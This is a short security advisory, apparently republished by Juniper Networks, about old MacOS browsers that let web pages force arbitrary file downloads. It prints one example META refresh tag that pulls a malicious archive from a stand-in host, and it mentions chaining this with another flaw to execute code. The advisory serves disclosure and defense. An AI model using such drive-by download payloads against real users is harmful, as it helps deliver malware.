Title: Multiple Vendor MacOS Browser Arbitrary Program Download Vulnerability
Severity: MODERATE
Description:
Various browsers for MacOS and MacOS X in Classic Mode allow malicious web pages to automatically download arbitrary files to the vulnerable user's computer.
This can be accomplished through the use of a META refresh tag similar to the following:
<META HTTP-EQUIV="refresh" CONTENT="1;URL=http://foo.com/malicious.sit">
The ability to place arbitrary files in a known location such as the default download directory may aid in the exploitation of BID 3935, "Apple MacOS Internet Explorer File Execution Vulnerability".
Additionally, the automatic opening of compressed files may allow content to be placed in mounted disk images. When extracted, the malicious files will reside in a known location, allowing exploitation of BID 3935 without knowing the download directory of the vulnerable system.
Affected Products:
- Microsoft Internet Explorer Macintosh Edition 4.5.0
- Microsoft Internet Explorer Macintosh Edition 4.5.0MRJ 2.1.4
- Microsoft Internet Explorer Macintosh Edition 4.5.0MRJ 2.2
- Microsoft Internet Explorer Macintosh Edition 5.0.0
- Netscape Netscape 4.77.0 Mac
- Netscape Netscape 4.78.0 Mac
- Omni Group OmniWeb 4.0.6
- Omni Group OmniWeb 4.1.0beta11
- Opera Software Opera Web Browser 5.0.0 Mac
- iCab Company iCab Pre 2.7.0
- iCab Company iCab Pre 2.71.0
References:
Juniper Networks provides this content via a wide variety of sources and production methods. If notified of errors or omissions in the content of this page, Juniper Networks, at its discretion, will modify or remove the page or leave the content as is, depending on various factors including but not limited to the reputation and authority of the party providing the notification. Please use the contact information displayed elsewhere on this page to report any errors or omissions regarding the content on this page.
